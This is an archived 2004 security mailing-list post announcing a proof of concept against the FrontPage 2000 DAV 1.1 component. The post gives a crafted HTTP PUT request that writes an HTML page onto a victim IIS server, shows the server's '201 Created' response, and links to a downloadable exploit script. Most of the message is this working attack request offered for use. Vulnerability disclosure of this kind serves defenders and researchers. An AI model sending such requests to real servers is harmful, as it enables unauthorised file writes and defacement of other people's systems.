| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <000901c4ef0d$ceafd660$0100a8c0@server> From: corryl at sitoverde.com (CorryL) Subject: Microsoft Data Access Dav1.1 PoC Microsoft DATA Access Internet Publishing Service Provider DAV 1.1 component of frontpage2000 is vulnerable to a special request of PUT a remote attacker using this bug succeeds to write some code html to the inside of the server victim Proof Of Concept: The remote attacker using the special request of PUT write the html page in the Victim Server. PUT /file.htm HTTP/1.0 Accept-Language: en-us;q=0.5 Translate: f Content-Length:17 User-Agent: Microsoft Data Access Internet Publishing Provider DAV 1.1 Host: www.hotst-victim.com Html Code Response to the Server: HTTP/1.1 201 Created Server: Microsoft-IIS/5.0 Date: Thu, 30 Dec 2004 22:29:36 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Location: http://192.168.0.3/vulne.htm Content-Length: 0 Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK The exploit download from http://hosting.xoned.org/upload/DAV1.1-PoC.pl Happy New Year By x0n3-h4ck For info: CorryL corryl80@...il.com www.x0n3-h4ck.tk Italian Security Team _________________________________ www.seekstat.it is your web stat
Powered by blists - more mailing lists